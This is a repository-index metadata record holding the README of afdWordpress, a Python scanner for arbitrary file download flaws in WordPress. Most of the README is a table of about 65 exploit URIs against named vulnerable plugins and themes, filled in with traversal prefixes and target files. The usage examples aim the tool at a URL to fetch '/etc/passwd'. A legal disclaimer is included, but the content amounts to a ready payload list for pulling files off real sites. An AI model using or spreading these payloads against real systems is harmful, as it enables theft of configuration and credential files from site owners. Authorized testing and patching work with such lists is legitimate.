{"id":22431149,"url":"https://github.com/mrcl0wnlab/afdwordpress","last_synced_at":"2025-08-01T11:32:52.121Z","repository":{"id":133102681,"uuid":"242032697","full_name":"MrCl0wnLab/afdWordpress","owner":"MrCl0wnLab","description":"Check arbitrary file download vulnerability in the WordPress","archived":false,"fork":false,"pushed_at":"2020-02-21T05:18:46.000Z","size":26,"stargazers_count":20,"open_issues_count":0,"forks_count":9,"subscribers_count":1,"default_branch":"master","last_synced_at":"2023-10-20T21:54:40.280Z","etag":null,"topics":["hacking","python","security","security-tools","wordpress"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/MrCl0wnLab.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2020-02-21T01:58:15.000Z","updated_at":"2023-10-20T21:54:40.762Z","dependencies_parsed_at":null,"dependency_job_id":"9bdd10a0-0963-4b97-9d26-b4d60a69f59b","html_url":"https://github.com/MrCl0wnLab/afdWordpress","commit_stats":null,"previous_names":[],"tags_count":0,"template":null,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MrCl0wnLab%2FafdWordpress","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MrCl0wnLab%2FafdWordpress/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MrCl0wnLab%2FafdWordpress/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MrCl0wnLab%2FafdWordpress/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/MrCl0wnLab","download_url":"https://codeload.github.com/MrCl0wnLab/afdWordpress/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":228372614,"owners_count":17909678,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking","python","security","security-tools","wordpress"],"created_at":"2024-12-05T21:22:08.365Z","updated_at":"2024-12-05T21:22:08.952Z","avatar_url":"https://github.com/MrCl0wnLab.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Wordpress A.F.D. Verification\n[![Version](https://img.shields.io/badge/afdWordpress-0.1-brightgreen.svg?maxAge=259200)]()\n[![Python 3.7](https://img.shields.io/badge/Python-3.7-yellow.svg)](https://www.python.org/)\n[![Build](https://img.shields.io/badge/Supported_OS-Linux-orange.svg)]()\n[![Build](https://img.shields.io/badge/Supported_OS-Mac-orange.svg)]()\n![GitHub](https://img.shields.io/github/license/MrCl0wnLab/afdWordpress?color=blue)\n\n## Check arbitrary file download vulnerability in the WordPress\n\n```\n + Autor: MrCl0wn\n + Blog: http://blog.mrcl0wn.com\n + GitHub: https://github.com/MrCl0wnLab\n + Twitter: https://twitter.com/MrCl0wnLab\n + Email: mrcl0wnlab\\@\\gmail.com\n```\n## WARNING\n```\n+------------------------------------------------------------------------------+\n| [!] Legal disclaimer: Usage of afdWordpress for attacking |\n| targets without prior mutual consent is illegal. |\n| It is the end user's responsibility to obey all applicable | \n| local, state and federal laws. |\n| Developers assume no liability and are not responsible for any misuse or |\n| damage caused by this program |\n+------------------------------------------------------------------------------+\n```\n![GitHub](https://i.imgur.com/M7OFyVb.png)\n\n### DESCRIPTION\n```\nThis tool aims to facilitate checking arbitrary file download vulnerability\n```\n### REQUIREMENTS\n```\nthreading\nargparse\ncsv\ncollections\nrandom\nurllib\n```\n### INSTALL\n```\n$ git clone https://github.com/MrCl0wnLab/afdWordpress\n$ cd afdWordpress\n$ pip3.7 install -r requirements.txt\n```\n### HELP\n```\n$ git clone https://github.com/MrCl0wnLab/afdWordpress\n$ cd afdWordpress\n$ python3.7 afd.py --help\n\n\n ▄████████ ▄████████ ████████▄ \n ███ ███ ███ ███ ███ ▀███ \n ███ ███ ███ █▀ ███ ███ \n ███ ███ ▄███▄▄▄ ███ ███ \n ▀███████████ ▀▀███▀▀▀ ███ ███ \n ███ ███ ███ ███ ███ \n ███ ███ ███ ███ ▄███ \n ███ █▀ ███ ████████▀ \n Arbitrary File Download-[ Verifier ]\n By MrCl0wn\n \nusage: tool [-h] --url http://url [--file /file.php] [--threads 10]\n\noptional arguments:\n -h, --help show this help message and exit\n --url http://url URL to request Ex: http://www.host.com\n --file /file.php File to fuzzing Ex: /wp-admin.php\n --threads 10 Threads\n```\n\n### USE\n```\n$ python3.7 afd.py --url https://blog.mrcl0wn.com \n$ python3.7 afd.py --url https://blog.mrcl0wn.com --thread 50\n$ python3.7 afd.py --url https://blog.mrcl0wn.com --thread 50 --file /etc/passwd\n```\n### SOURCE VERIFICATION\n\u003e File: inject.csv\n\n|exploit_uri|pwd_count |ref |\n|-----------|-----------------------------|------|\n|/?action=cpis_init\u0026cpis-action=f-download\u0026purchase_id=1\u0026cpis_user_email=i0SECLAB@intermal.com\u0026f=_PWD__FILE_|4 | |\n|/?mdocs-img-preview=_PWD__FILE_|3 | |\n|/mdocs-posts/?mdocs-img-preview=_PWD__FILE_|3 | |\n|/wp-admin/admin-ajax.php?action=kbslider_show_image\u0026img=_PWD__FILE_|1 | |\n|/wp-admin/admin-ajax.php?action=revslider_show_image\u0026img=_PWD__FILE_|0 | |\n|/wp-admin/admin-ajax.php?action=revslider_show_image\u0026img=_PWD__FILE_|1 | |\n|/wp-admin/admin.php?page=miwoftp\u0026option=com_miwoftp\u0026action=download\u0026dir=/\u0026item=_PWD__FILE_\u0026order=name\u0026srt=yes|0 | |\n|/wp-admin/edit.php?post_type=wd_ads_ads\u0026export=export_csv\u0026path=_PWD__FILE_|1 | |\n|/wp-admin/tools.php?content=\u0026wp-attachment-export-download=true|0 |https://packetstormsecurity.com/files/132693/WordPress-WP-Attachment-Export-0.2.3-Arbitrary-File-Download.html|\n|/wp-admin/tools.php?content=attachment\u0026wp-attachment-export-download=true|0 |https://packetstormsecurity.com/files/132693/WordPress-WP-Attachment-Export-0.2.3-Arbitrary-File-Download.html|\n|/wp-content/force-download.php?file=_PWD__FILE_|0 | |\n|/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=_PWD__FILE_|0 | |\n|/wp-content/plugins//asgallDownload.php?imgname=_PWD__FILE_|3 | |\n|/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=_PWD__FILE_|3 | |\n|/wp-content/plugins/allow-l10n-upload-filename/download.php?id=_PWD__FILE_|3 | |\n|/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=_PWD__FILE_|3 | |\n|/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=_PWD__FILE_|2 | |\n|/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=_PWD__FILE_|3 | |\n|/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=_PWD__FILE_|10 | |\n|/wp-content/plugins/count-per-day/download.php?n=1\u0026f=_PWD__FILE_|0 | |\n|/wp-content/plugins/document_manager/views/file_download.php?fname=_PWD__FILE_|2 | |\n|/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=_PWD__FILE_\u0026file_size=10|4 | |\n|/wp-content/plugins/history-collection/download.php?var=_PWD__FILE_|3 | |\n|/wp-content/plugins/hwm_board/download.php?filename=_PWD__FILE_|0 | |\n|/wp-content/plugins/hwm_board/download.php?filename=_PWD__FILE_\u0026fileNa=_PWD__FILE_|0 | |\n|/wp-content/plugins/image-export/download.php?file=_PWD__FILE_|0 | |\n|/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/_PWD__FILE_|0 | |\n|/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/_PWD__FILE_|0 | |\n|/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/_PWD__FILE_|0 | |\n|/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=_PWD__FILE_|0 | |\n|/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=_PWD__FILE_|6 | |\n|/wp-content/plugins/recent-backups/download-file.php?file_link=_PWD__FILE_|0 | |\n|/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=_PWD__FILE_\u0026path=_PWD__FILE_|7 | |\n|/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=_PWD__FILE_|7 | |\n|/wp-content/plugins/sermon-shortcodes/download.php?file=_PWD__FILE_|0 |https://packet..com/files/150507/...bitrary-File-Download.html|\n|/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=_PWD__FILE_|0 |https://cxsecurity.com/issue/WLB-2018110241|\n|/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=_PWD__FILE_|3 |https://dl.packe...503-exploits/wpaspose-disclose.txt|\n|/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=_PWD__FILE_|9 |https://www.exploit-db.com/exploits/37530|\n|/wp-content/plugins/wp-filemanager/incl/libfile.php?\u0026path=_PWD_\u0026filename=_FILE_\u0026action=download|2 |https://wp.com/vulnerabilities/6499|\n|/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream\u0026path=_PWD__FILE_\u0026name=_PWD__FILE_|0 | |\n|/wp-content/plugins/wp-swimteam/include/user/download.php?file=_PWD__FILE_\u0026filename=_PWD__FILE_\u0026contenttype=text/html\u0026transient=1\u0026abspath=/usr/share/wordpress|0 |https://www.exploit-db.com/exploits/37601|\n|/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=_PWD__FILE_|0 | |\n|/wp-content/themes/acento/includes/view-pdf.php?download=1\u0026file=/path/_PWD__FILE_|0 | |\n|/wp-content/themes/antioch/lib/scripts/download.php?file=_PWD__FILE_|5 | |\n|/wp-content/themes/authentic/includes/download.php?file=_PWD__FILE_|4 | |\n|/wp-content/themes/churchope/lib/downloadlink.php?file=_PWD__FILE_|4 | |\n|/wp-content/themes/epic/includes/download.php?file=_PWD__FILE_|0 | |\n|/wp-content/themes/erinvale/download.php?file=_PWD__FILE_|3 |https://dl.pac.../1808-exploits/wpdreamsmiths-disclose.txt|\n|/wp-content/themes/felis/download.php?file=_PWD__FILE_|0 | |\n|/wp-content/themes/fiestaresidences/download.php?file=_PWD__FILE_|3 |https://dl.packe.../1808-exploits/wpdreamsmiths-disclose.txt|\n|/wp-content/themes/hsv/download.php?file=_PWD__FILE_|3 |https://dl.packet.../1808-exploits/wpdreamsmiths-disclose.txt|\n|/wp-content/themes/linenity/functions/download.php?imgurl=_PWD__FILE_|4 | |\n|/wp-content/themes/lote27/download.php?download=_PWD__FILE_|3 | |\n|/wp-content/themes/markant/download.php?file=_PWD__FILE_|2 | |\n|/wp-content/themes/MichaelCanthony/download.php?file=_PWD__FILE_|3 | |\n|/wp-content/themes/mTheme-Unus/css/css.php?files=_PWD__FILE_|4 | |\n|/wp-content/themes/NativeChurch/download/download.php?file=_PWD__FILE_|4 | |\n|/wp-content/themes/optimus/download.php?file=_PWD__FILE_|3 |https://dl.pac.../1808-exploits/wpdreamsmiths-disclose.txt|\n|/wp-content/themes/SMWF/inc/download.php?file=_PWD__FILE_|0 | |\n|/wp-content/themes/TheLoft/download.php?file=|3 | |\n|/wp-content/themes/trinity/lib/scripts/download.php?file=_PWD__FILE_|5 | |\n|/wp-content/themes/urbancity/lib/scripts/download.php?file=_PWD__FILE_|5 | |\n|/wp-content/themes/yakimabait/download.php?file=_PWD__FILE_|0 | |\n\n### DESCRIPTION FILE\n|exploit_uri|pwd_count |ref |\n|-----------|-----------------------------|------|\n|url_exploit_get| count_mount_pwd | ref_exploit|\n\n\u003e exploit_uri: Request get for exploration and concatenation with target_url.\n\n\u003e pwd_count: Count pwd for concatenation loop.\n\n\u003e ref: This column is referential document.\n### OUTPUT RESULT\n\u003e ok-file.log\n\n\u003e error-file.log\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmrcl0wnlab%2Fafdwordpress","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmrcl0wnlab%2Fafdwordpress","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmrcl0wnlab%2Fafdwordpress/lists"}